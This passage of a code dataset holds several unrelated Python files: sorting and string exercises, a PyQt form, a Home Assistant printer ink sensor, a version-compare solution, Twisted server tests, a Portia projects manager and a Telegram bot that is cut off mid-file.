x\n\t\t\telse :\n\t\t\t\tbreak\n\t\t\tprint(\"arreglo = %s\",arreglo)\n\n\t\tprint(\"arreglo fin = %s\",arreglo)\n\t\tself.quicksort(arreglo, first, j-1)\n\t\tself.quicksort(arreglo, i+1, last)\n\n\n\nb = Quicksort([2,7,50,3,93,1,4,33,5])\nb.ordena()\nprint(\"Final = %s\", b.arreglo)\n","sub_path":"python/cosasDesorganizadas/algoritmosDeOrdenamiento/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"518848314","text":"# -*- coding: utf-8 -*-\n\ntabby_cat = \"\\tI will become a tab.\"\npersian_cat = \"I'm \\n separate.\"\nbackslash_cat = \"I'm \\\\ c \\\\ at.\"\n\nfat_cat = \"\"\"\nto do list:\n\\t* cat's meal\n\\t* fishes\n\\t* duck\\n\\t* bird\n\"\"\"\n\nprint(tabby_cat)\nprint(persian_cat)\nprint(backslash_cat)\nprint(fat_cat)\n\n","sub_path":"practise_example_code/ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"53896623","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom settings import *\n\nclass NewUserWindow(QtWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n\n self.setObjectName(\"NewUserWindow\")\n self.resize(395, 435)\n self.setMinimumSize(QtCore.QSize(395, 435))\n self.setMaximumSize(QtCore.QSize(395, 435))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(IMAGES_DIR+\"icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n self.setStyleSheet(\"background-color: #414053;\")\n\n self.centralwidget = QtWidgets.QWidget(self)\n self.centralwidget.setObjectName(\"central_widget\")\n\n self.verticalWidget = QtWidgets.QWidget(self.centralwidget)\n self.verticalWidget.setGeometry(QtCore.QRect(40, 20, 321, 381))\n self.verticalWidget.setStyleSheet(\"\"\"QLineEdit {\n color: white;\n }\"\"\")\n self.verticalWidget.setObjectName(\"verticalWidget\")\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalWidget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n\n self.newUserLabel = QtWidgets.QLabel(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.newUserLabel.sizePolicy().hasHeightForWidth())\n\n self.newUserLabel.setSizePolicy(sizePolicy)\n self.newUserLabel.setMaximumSize(QtCore.QSize(16777215, 100))\n\n font = QtGui.QFont()\n font.setPointSize(16)\n\n self.newUserLabel.setFont(font)\n self.newUserLabel.setStyleSheet(\"color: white;\")\n self.newUserLabel.setAlignment(QtCore.Qt.AlignCenter)\n self.newUserLabel.setObjectName(\"newUserLabel\")\n\n self.verticalLayout.addWidget(self.newUserLabel)\n\n spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem)\n self.profilePhoto = QtWidgets.QPushButton(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.profilePhoto.sizePolicy().hasHeightForWidth())\n\n self.profilePhoto.setSizePolicy(sizePolicy)\n self.profilePhoto.setMaximumSize(QtCore.QSize(200, 120))\n\n font.setPointSize(14)\n\n self.profilePhoto.setFont(font)\n self.profilePhoto.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.profilePhoto.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.profilePhoto.setLayoutDirection(QtCore.Qt.LeftToRight)\n\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(IMAGES_DIR+\"users_photo/default.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n self.profilePhoto.setIcon(icon1)\n self.profilePhoto.setIconSize(QtCore.QSize(50, 50))\n self.profilePhoto.setFlat(True)\n self.profilePhoto.setObjectName(\"profilePhoto\")\n\n self.verticalLayout.addWidget(self.profilePhoto, 0, QtCore.Qt.AlignHCenter)\n\n spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem1)\n\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\n\n self.name = QtWidgets.QLabel(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.name.sizePolicy().hasHeightForWidth())\n\n self.name.setSizePolicy(sizePolicy)\n self.name.setMaximumSize(QtCore.QSize(100, 45))\n\n font.setPointSize(14)\n\n self.name.setFont(font)\n self.name.setStyleSheet(\"color: white;\")\n self.name.setAlignment(QtCore.Qt.AlignCenter)\n self.name.setObjectName(\"name\")\n \n self.horizontalLayout_3.addWidget(self.name)\n self.name_edit = QtWidgets.QLineEdit(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.name_edit.sizePolicy().hasHeightForWidth())\n\n self.name_edit.setSizePolicy(sizePolicy)\n self.name_edit.setAlignment(QtCore.Qt.AlignCenter)\n self.name_edit.setPlaceholderText(\"\")\n self.name_edit.setObjectName(\"name_edit\")\n\n self.horizontalLayout_3.addWidget(self.name_edit)\n\n self.verticalLayout.addLayout(self.horizontalLayout_3)\n\n spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem2)\n\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n\n self.last_name = QtWidgets.QLabel(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.last_name.sizePolicy().hasHeightForWidth())\n\n self.last_name.setSizePolicy(sizePolicy)\n self.last_name.setMaximumSize(QtCore.QSize(100, 45))\n\n font.setPointSize(14)\n\n self.last_name.setFont(font)\n self.last_name.setStyleSheet(\"color: white;\")\n self.last_name.setAlignment(QtCore.Qt.AlignCenter)\n self.last_name.setObjectName(\"last_name\")\n\n self.horizontalLayout.addWidget(self.last_name)\n\n self.surname_edit = QtWidgets.QLineEdit(self.verticalWidget)\n\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.surname_edit.sizePolicy().hasHeightForWidth())\n\n self.surname_edit.setSizePolicy(sizePolicy)\n self.surname_edit.setAlignment(QtCore.Qt.AlignCenter)\n self.surname_edit.setObjectName(\"surname_edit\")\n\n self.horizontalLayout.addWidget(self.surname_edit)\n\n self.verticalLayout.addLayout(self.horizontalLayout)\n\n spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\n\n self.verticalLayout.addItem(spacerItem3)\n\n self.create_button = QtWidgets.QPushButton(self.verticalWidget)\n\n font.setPointSize(16)\n\n self.create_button.setFont(font)\n self.create_button.setStyleSheet(\"background-color: green;color: white;\")\n self.create_button.setObjectName(\"create_button\")\n\n self.verticalLayout.addWidget(self.create_button)\n\n self.setCentralWidget(self.centralwidget)\n \n self.statusbar = QtWidgets.QStatusBar(self)\n self.statusbar.setObjectName(\"statusbar\")\n self.setStatusBar(self.statusbar)\n\n self.retranslate_ui()\n QtCore.QMetaObject.connectSlotsByName(self)\n\n def retranslate_ui(self):\n _translate = QtCore.QCoreApplication.translate\n self.setWindowTitle(_translate(\"NewUserWindow\", \"Новый пользователь\"))\n self.newUserLabel.setText(_translate(\"NewUserWindow\", \"Создать нового пользователя:\"))\n self.name.setText(_translate(\"NewUserWindow\", \"Имя :\"))\n self.last_name.setText(_translate(\"NewUserWindow\", \"Фамилия: \"))\n self.create_button.setText(_translate(\"NewUserWindow\", \"Создать\"))\n","sub_path":"src/user_form.py","file_name":"user_form.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118345437","text":"import logging\nimport json\nimport urllib.request \nfrom datetime import timedelta\nfrom datetime import datetime\n\nimport voluptuous as vol\n\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity import Entity\nfrom homeassistant.components.sensor import PLATFORM_SCHEMA\nfrom homeassistant.const import (\n CONF_NAME, CONF_HOST, CONF_MONITORED_CONDITIONS)\n\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_IP = '127.0.0.1'\n\nSCAN_INTERVAL = timedelta(minutes=60)\n\nMONITORED_CONDITIONS = { \n 'black': ['Inklevel Black', '%', 'mdi:water'],\n 'magenta': ['Inklevel Magenta', '%', 'mdi:water'],\n 'cyan': ['Inklevel Cyan', '%', 'mdi:water'],\n 'yellow': ['Inklevel Yellow', '%', 'mdi:water'],\n 'clean': ['Inklevel Cleaning', '%', 'mdi:water'],\n}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_HOST, default=DEFAULT_IP): cv.string,\n vol.Required(CONF_MONITORED_CONDITIONS, default=MONITORED_CONDITIONS):\n vol.All(cv.ensure_list, [vol.In(MONITORED_CONDITIONS)]),\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the cartridge sensor.\"\"\"\n host = config.get(CONF_HOST)\n \n \"\"\"Set up the printer API.\"\"\"\n api = EpsonPrinter(host)\n\n sensors = [EpsonPrinterCartridge(hass, api, condition)\n for condition in config[CONF_MONITORED_CONDITIONS]]\n\n add_devices(sensors, True)\n\n\nclass EpsonPrinterCartridge(Entity):\n \"\"\"Representation of a cartdige sensor.\"\"\"\n\n def __init__(self, hass, api, variable):\n \"\"\"Initialize a cartridge sensor.\"\"\"\n self._hass = hass\n self._api = api\n \n variable_info = MONITORED_CONDITIONS[variable]\n self._var_name = variable_info[0]\n self._var_id = variable;\n self._var_unit = variable_info[1]\n self._var_icon = variable_info[2] \n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._var_name\n\n @property\n def icon(self):\n \"\"\"Icon to use in the frontend, if any.\"\"\"\n return self._var_icon\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit the value is expressed in.\"\"\"\n return self._var_unit\n \n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n return self._api.getSensorValue(self._var_id)\n\n @property\n def available(self):\n \"\"\"Could the device be accessed during the last update call.\"\"\"\n return self._api.available\n\n def update(self):\n \"\"\"Get the latest data from the Epson printer.\"\"\"\n self._api.update()\n\n\nclass EpsonPrinter(object):\n def __init__(self, ip):\n \"\"\"Initialize the link to the printer status page.\"\"\" \n self._resource = \"http://\"+ip+\"/PRESENTATION/HTML/TOP/PRTINFO.HTML\" \n self.data = None\n self.available = True\n self.update()\n \n def getSensorValue(self,sensor):\n \"\"\"To make it the user easier to configre the cartridge type.\"\"\"\n sensorCorrected = \"\";\n _LOGGER.debug(\"Color to fetch: \"+sensor)\n if sensor == \"black\":\n sensorCorrected = \"K\"\n elif sensor == \"magenta\":\n sensorCorrected = \"M\"\n elif sensor == \"cyan\":\n sensorCorrected = \"C\"\n elif sensor == \"yellow\":\n sensorCorrected = \"Y\"\n elif sensor == \"clean\":\n sensorCorrected = \"Waste\"\n else:\n return \"0\";\n \n try:\n search = \"Ink_\"+sensorCorrected+\".PNG' height='\"\n result = self.data.index(search) \n startPos = result+len(search) \n valueRaw = self.data[startPos:startPos+2]\n \"\"\"In case the value is a single digit, we will get a ' char, remove it.\"\"\"\n return valueRaw.replace(\"'\", \"\")\n except Exception as e:\n _LOGGER.error(\"Unable to fetch level from data: \"+str(e))\n return \"0\"\n\n def update(self):\n try: \n \"\"\"Just fetch the HTML page.\"\"\" \n response = urllib.request.urlopen(self._resource)\n self.data = response.read().decode(\"utf-8\")\n self.available = True\n except Exception as e:\n _LOGGER.error(\"Unable to fetch data from your printer: \"+str(e))\n self.available = False\n","sub_path":"custom_components/sensor/epsonprinter.py","file_name":"epsonprinter.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"214595639","text":"# edge case: 1 vs 1.0, 1.001 vs 1.01\n\n\nclass Solution(object):\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n def getArr(version):\n arr = version.split(\".\")\n arr = map(int, arr)\n while arr and arr[-1] == 0: # mistake: don't forget this step\n arr.pop()\n return arr\n arr1 = getArr(version1)\n arr2 = getArr(version2)\n \n i, j = 0, 0\n while i < len(arr1) and j < len(arr2):\n if arr1[i] == arr2[j]:\n i, j = i+1, j+1\n elif arr1[i] > arr2[j]: # larger\n return 1\n else: # smaller\n return -1\n if i == len(arr1) and j == len(arr2): # equal\n return 0\n if i == len(arr1): # smaller\n return -1\n return 1\n\n\n\"\"\"\nCompare two version numbers version1 and version2.\nIf version1 > version2 return 1; if version1 < version2 return -1; \notherwise return 0.\n\nYou may assume that the version strings are non-empty and contain only digits and the . character.\n\nThe . character does not represent a decimal point and is used to separate number sequences.\n\nFor instance, 2.5 is not \"two and a half\" or \"half way to version three\", \nt is the fifth second-level revision of the second first-level revision.\n\nYou may assume the default revision number for each level of a version number to be 0. \nFor example, version number 3.4 has a revision number of 3 and 4 for its first and second level revision number. \nIts third and fourth level revision number are both 0.\n\n \n\nExample 1:\n\nInput: version1 = \"0.1\", version2 = \"1.1\"\nOutput: -1\nExample 2:\n\nInput: version1 = \"1.0.1\", version2 = \"1\"\nOutput: 1\nExample 3:\n\nInput: version1 = \"7.5.2.4\", version2 = \"7.5.3\"\nOutput: -1\nExample 4:\n\nInput: version1 = \"1.01\", version2 = \"1.001\"\nOutput: 0\nExplanation: Ignoring leading zeroes, both “01” and “001\" represent the same number “1”\nExample 5:\n\nInput: version1 = \"1.0\", version2 = \"1.0.0\"\nOutput: 0\nExplanation: The first version number does not have a third level revision number, \nwhich means its third level revision number is default to \"0\"\n \n\nNote:\n\nVersion strings are composed of numeric strings separated by dots . and this numeric strings may have leading zeroes.\nVersion strings do not start or end with dots, and they will not be two consecutive dots.\n\"\"\"\n","sub_path":"0165. Compare Version Numbers.py","file_name":"0165. Compare Version Numbers.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332795186","text":"import pytest\nfrom http_server_async import HTTPResponder\n\n\n@pytest.fixture(scope='function')\ndef make_get_responder():\n gr = HTTPResponder()\n return gr\n\n\n@pytest.fixture(scope='function')\ndef make_request():\n from twisted.web.http import HTTPChannel\n hc = HTTPChannel()\n from twisted.web.http import Request\n rq = Request(hc, None)\n return rq\n\n\ndef test_dot_dot(make_get_responder, make_request):\n from twisted.web import resource\n gr = make_get_responder\n r = make_request\n r.uri = 'images/sample.._1.png'\n response = gr.render(r)\n page = resource.ForbiddenResource(message=\"Sorry, resource is forbidden.\")\n assert response == page.render(r)\n\n\ndef test_image(make_get_responder, make_request):\n path = \"webroot/images/sample_1.png\"\n make_request.method = \"GET\"\n make_request.uri = \"/images/sample_1.png\"\n make_request.clientproto = \"HTTP/1.1\"\n\n response = make_get_responder.render(make_request)\n body = None\n with open(path) as f:\n body = f.read()\n assert response == body\n\n\ndef test_txt_file(make_get_responder, make_request):\n path = \"webroot/sample.txt\"\n make_request.method = \"GET\"\n make_request.uri = \"/sample.txt\"\n make_request.clientproto = \"HTTP/1.1\"\n\n response = make_get_responder.render(make_request)\n body = None\n with open(path) as f:\n body = f.read()\n assert response == body\n\n\ndef test_404_error(make_get_responder, make_request):\n from twisted.web import resource\n make_request.method = \"GET\"\n make_request.uri = \"/not_there.txt\"\n make_request.clientproto = \"HTTP/1.1\"\n\n response = make_get_responder.render(make_request)\n page = resource.NoResource(\n message=\"Sorry. No luck finding that resource.\")\n error = page.render(make_request)\n assert response == error\n\n\ndef test_505_error(make_get_responder, make_request):\n from twisted.web import resource\n make_request.method = \"GET\"\n make_request.uri = \"/\"\n make_request.clientproto = \"HTTP/1.0\"\n\n response = make_get_responder.render(make_request)\n page = resource.ErrorPage(\n 505, \"Not Supported\",\n \"The server refuses to support the HTTP protocol version \"\n \"used in the request message.\")\n error = page.render(make_request)\n assert response == error\n\n\ndef test_501_error(make_get_responder, make_request):\n from twisted.web import resource\n make_request.method = \"SET\"\n make_request.uri = \"/\"\n make_request.clientproto = \"HTTP/1.0\"\n\n response = make_get_responder.render(make_request)\n page = resource.ErrorPage(\n 501, \"Not Implemented\",\n \"The server does not support the functionality required \"\n \"to fulfill the request.\")\n error = page.render(make_request)\n assert response == error\n","sub_path":"test_http_server_async.py","file_name":"test_http_server_async.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128768502","text":"from __future__ import absolute_import\nimport errno\nimport json\nimport os\nimport re\n\nfrom os.path import join\nfrom twisted.internet.defer import Deferred\nfrom twisted.web.resource import NoResource\nfrom twisted.web.server import NOT_DONE_YET\nfrom .errors import BaseError, BaseHTTPError, BadRequest\nfrom .projecttemplates import templates\nfrom .resource import SlydJsonObjectResource, SlydJsonErrorPage\nfrom .utils.copy import FileSystemSpiderCopier\nfrom .utils.download import ProjectArchiver, CodeProjectArchiver\nfrom .utils.storage import ContentFile, FsStorage\n\n\n# stick to alphanum . and _. Do not allow only .'s (so safe for FS path)\n_INVALID_PROJECT_RE = re.compile('[^A-Za-z0-9._]|^\\.*$')\n\n\ndef create_projects_manager_resource(spec_manager):\n return ProjectsManagerResource(spec_manager)\n\n\nclass ProjectsManagerResource(SlydJsonObjectResource):\n\n def __init__(self, spec_manager):\n SlydJsonObjectResource.__init__(self)\n self.spec_manager = spec_manager\n\n def getChildWithDefault(self, project_path_element, request): # project_path_element: \n # 检查当前用户的访问权限\n auth_info = request.auth_info\n if ('authorized_projects' not in auth_info or\n auth_info.get('staff', False) or # 检查当前用户是否为staff\n project_path_element in auth_info['authorized_projects']):\n \n request.project = project_path_element # \n try:\n next_path_element = request.postpath.pop(0)\n except IndexError:\n next_path_element = 'spec' # /projects/ 自动转换为: /projects//spec\n \n # self.children: Resource类中原始定义的属性,保存所有通过putChild()注册的child\n # 调用putChild(path, child):self.children[path] = child\n if next_path_element not in self.children: # 这里的children的keys包括:'spec', 'bot'\n raise NoResource(\"No such child resource.\") # 路径必须满足:projects//spec 或 projects//bot\n\n request.prepath.append(project_path_element) # [ 'projects', ]\n return self.children[next_path_element] # 因为没有实现getChild(),所以直接访问self.children\n else:\n # 无访问权限,返回错误页\n return SlydJsonErrorPage(\n 403, \"Forbidden\", \"You don't have access to this project.\")\n\n # 被render_POST()调用\n def handle_project_command(self, projects_manager, command_spec):\n command = command_spec.get('cmd')\n dispatch_func = projects_manager.project_commands.get(command)\n if dispatch_func is None:\n self.bad_request(\n \"Unrecognised command %s, available commands: %s.\" %\n (command, ', '.join(projects_manager.project_commands.keys())))\n args = command_spec.get('args', [])\n try:\n retval = dispatch_func(*args)\n except TypeError:\n self.bad_request(\"Incorrect arguments for command %s.\" % command)\n except OSError as ex:\n if ex.errno == errno.ENOENT:\n self.not_found()\n elif ex.errno == errno.EEXIST or ex.errno == errno.ENOTEMPTY:\n self.bad_request(\"A project with that name already exists.\")\n raise\n except BaseError as ex:\n self.error(ex.status, ex.title, ex.body)\n else:\n return retval or ''\n return ''\n\n # \n def render_GET(self, request):\n auth_info = request.auth_info\n project_manager = self.spec_manager.project_manager(auth_info)\n projects = project_manager.list_projects()\n for project in projects:\n project_spec = self.spec_manager.project_spec(project['id'], auth_info)\n project['spiders'] = list(project_spec.list_spiders())\n\n return {\n \"projects\": projects\n }\n\n def render_POST(self, request):\n\n def finish_request(val):\n if modifier:\n val = modifier(request, obj, val)\n val and request.write(val)\n request.finish()\n\n def request_failed(failure):\n request.setResponseCode(500)\n request.write(failure.getErrorMessage())\n request.finish()\n return failure\n\n project_manager = self.spec_manager.project_manager(request.auth_info)\n project_manager.request = request\n obj = self.read_json(request)\n try:\n retval = self.handle_project_command(project_manager, obj)\n modifier = project_manager.modify_request.get(obj.get('cmd'))\n if isinstance(retval, Deferred):\n retval.addCallbacks(finish_request, request_failed)\n return NOT_DONE_YET\n else:\n if modifier:\n retval = modifier(request, obj, retval)\n return retval\n except BaseHTTPError as ex:\n self.error(ex.status, ex.title, ex.body)\n\n\ndef allowed_project_name(name):\n return not _INVALID_PROJECT_RE.search(name)\n\n# 基类:管理projects库\nclass ProjectsManager(object):\n\n @classmethod\n def setup(cls, location, **kwargs):\n cls.base_dir = location\n\n def __init__(self, auth_info):\n # 用户认证和授权相关信息\n self.auth_info = auth_info\n self.user = auth_info['username']\n \n # \n self.modify_request = {\n 'download': self._render_file\n }\n \n # 项目操作的命令:创建,移动,删除,复制,下载\n self.project_commands = {\n 'create': self.create_project, # 对应的方法\n 'mv': self.rename_project,\n 'rm': self.remove_project,\n 'copy': self.copy_data,\n 'download': self.download_project\n }\n\n def run(self, callback, **kwargs):\n return callback(**kwargs)\n\n # 操作:列出全部projects\n def all_projects(self):\n raise NotImplementedError\n\n # 操作:列出(用户可访问的)全部projects\n def list_projects(self):\n if 'authorized_projects' in self.auth_info:\n return self.auth_info['authorized_projects']\n else:\n return list(self.all_projects())\n\n # 操作:创建project\n def create_project(self, name):\n self.validate_project_name(name)\n project_filename = self.project_filename(name)\n \n # 一个project下包含的文件库(使用模板生成文件)\n # project.json\n # scrapy.cfg\n # setup.py\n # items.json\n # spiders\n # __init__.py\n # settings.py\n project_files = {\n 'project.json': templates['PROJECT'], # 模板即大段字符串\n 'scrapy.cfg': templates['SCRAPY'],\n 'setup.py': templates['SETUP'] % str(name),\n 'items.json': templates['ITEMS'],\n join('spiders', '__init__.py'): '',\n join('spiders', 'settings.py'): templates['SETTINGS'],\n }\n \n # 创建新project对应的文件库\n for filename, template in project_files.items():\n path = join(project_filename, filename)\n # 使用属性storage的写文件方法save()\n self.storage.save(path, ContentFile(template, path)) # 属性storage由继承类定义\n\n # 操作:更名project\n def rename_project(self, from_name, to_name):\n self.validate_project_name(from_name)\n self.validate_project_name(to_name)\n # 使用属性storage的移动文件方法move()\n self.storage.move(self.project_filename(from_name),\n self.project_filename(to_name))\n\n # 操作:删除project\n def remove_project(self, name):\n # 使用属性storage的删除目录树方法rmtree()\n self.storage.rmtree(self.project_filename(name))\n\n # 操作\n def edit_project(self, name, revision=None):\n # Do nothing here, but subclasses can use this method as a hook\n # e.g. to import projects from another source.\n return\n\n # 辅助:检查project name是否合法(不合法会raise)\n def validate_project_name(self, name):\n if not allowed_project_name(name):\n raise BadRequest('Bad Request', 'Invalid project name %s.' % name)\n\n # 操作\n def copy_data(self, source, destination, spiders, items):\n raise NotImplementedError\n\n # 操作\n def download_project(self, name, spiders=None, version=None, **kwargs):\n raise NotImplementedError\n\n # 操作:提交changes\n def commit_changes(self):\n if getattr(self, 'storage', None):\n # 使用属性storage的commit()\n self.storage.commit()\n\n def _render_file(self, request, request_data, body):\n name = request_data.get('args')[0].encode('utf-8')\n request.setHeader('Content-Type', 'application/zip')\n request.setHeader('Content-Disposition', 'attachment; '\n 'filename=\"%s.zip\"' % name)\n request.setHeader('Content-Length', len(body))\n return body\n\n def __repr__(self):\n return '%s(%s)' % (self.__class__.__name__, str(self))\n\n def __str__(self):\n return '%s' % self.user\n\n# 基于本地文件系统的projects库管理器\n# (1) 实现了方法:all_projects(), copy_data(), download_project()\n# (2) 提供了方法:project_filename()\nclass FileSystemProjectsManager(ProjectsManager):\n storage_class = FsStorage # <== slyd.utils.storage: class FsStorage(CommitingStorage, FileSystemStorage)\n basedir = '.'\n\n def __init__(self, auth_info):\n super(FileSystemProjectsManager, self).__init__(auth_info)\n self.storage = self.storage_class(self.base_dir)\n self.projectsdir = self.base_dir # 保存projects的目录\n\n # 操作:列出所有projects的id和name\n def all_projects(self):\n try:\n # 使用属性storage的列举目录方法listdir()\n for fname in self.storage.listdir(self.projectsdir):\n if os.path.isdir(join(self.projectsdir, fname)):\n yield {'id': fname, 'name': fname} # 返回:{'id':..., 'name':...}\n except OSError as ex:\n if ex.errno != errno.ENOENT:\n raise\n\n # 指定name的project的目录全路径\n def project_filename(self, name):\n return join(self.projectsdir, name)\n\n # \n def copy_data(self, source, destination, spiders, items):\n copier = FileSystemSpiderCopier(source, destination, self.projectsdir)\n return json.dumps(copier.copy(spiders, items))\n\n def download_project(self, name, spiders=None, version=None, fmt=None,\n **kwargs):\n storage = self.storage_class(self.project_filename(name))\n if fmt == u'code':\n archiver = CodeProjectArchiver(storage, name=name)\n else:\n archiver = ProjectArchiver(storage, name=name)\n return archiver.archive(spiders).read()\n","sub_path":"slyd/slyd/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":11164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234930289","text":"# -*- coding: utf-8 -*-\n# author: Avimitin\n# datetime: 2020/3/27 18:04\nimport telebot\nfrom telebot import types\nimport random\nimport yaml\nimport re\nimport json\nimport logging\nimport time\nfrom modules import regexp_search\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG)\n\n# 从config文件读取token\nwith open(\"config/config.yaml\", 'r+', encoding='UTF-8') as token_file:\n bot_token = yaml.load(token_file, Loader=yaml.FullLoader)\nTOKEN = bot_token['TOKEN']\n\n# 实例化机器人\nbot = telebot.TeleBot(TOKEN)\n\n# 加载用户信息\nMYID = bot_token['USERID']\n\n# 命令返回语句\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n new_message = bot.send_message(message.chat.id, \"咱是个可爱的回话机器人\")\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n\n\n@bot.message_handler(commands=['help'])\ndef send_help(message):\n new_message = bot.send_message(message.chat.id,\n \"\"\"\nAuthor: \n\n@SaiToAsuKa_kksk\n\nSponsor:\n\n暂时还没有赞助,假如你对我的 bot 感兴趣非常欢迎私聊我\n\nGuide:\n\n大部分功能为管理员专属,目前普通用户可用 /post 功能投稿自己感兴趣的内容\n\nAffiliate:\n\n我真的真的续不起服务器了QWQ,快点击 AFF 帮助我吧\n\n【VULTR1】 【VULTR2】\n\nGroup:\n\nNSFW 中文水群: @ghs_chat\nNSFW 本子推荐频道: @hcomic\nBOT 更新频道: @avimitinbot\nBOT 测试群组: @avimitin_test\n \"\"\", parse_mode=\"HTML\",disable_web_page_preview=True)\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id,\n message_id=new_message.message_id)\n\n\n# 关键词添加程序\n@bot.message_handler(commands=['add'])\ndef add_keyword(message):\n if message.from_user.username != 'example':\n new_message = bot.send_message(message.chat.id, '别乱碰我!')\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 4:\n bot.send_message(message.chat.id, '/add 命令用法: `/add keyword=value` 。请不要包含空格。', parse_mode='Markdown')\n elif re.search(r' ', message.text[5:]):\n bot.send_message(message.chat.id, '请不要包含空格!')\n else:\n text = message.text[5:]\n split_sen = re.split(r'=', text)\n split_sen_dic = {split_sen[0]: split_sen[1]}\n bot.send_message(message.chat.id, '我已经学会了,当你说{}的时候,我会回复{}'.format(split_sen[0], split_sen[1]))\n with open('config/Reply.yml', 'a+', encoding='UTF-8') as reply_file:\n reply_file.write('\\n')\n yaml.dump(split_sen_dic, reply_file, allow_unicode=True)\n\n\n# 关键词删除程序\n@bot.message_handler(commands=['delete'])\ndef del_keyword(message):\n if message.from_user.username != 'SaiToAsuKa_kksk':\n new_message = bot.send_message(message.chat.id, '你不是我老公,爬')\n time.sleep(10)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 7:\n bot.send_message(message.chat.id, \"/delete usage: `/delete keyword`.\", parse_mode='Markdown')\n else:\n text = message.text[8:]\n with open('config/Reply.yml', 'r+', encoding='UTF-8') as reply_file:\n reply_msg_dic = yaml.load(reply_file, Loader=yaml.FullLoader)\n if reply_msg_dic.get(text):\n del reply_msg_dic[text]\n bot.send_message(message.chat.id, '已经删除{}'.format(text))\n with open('config/Reply.yml', 'w+', encoding='UTF-8') as new_file:\n yaml.dump(reply_msg_dic, 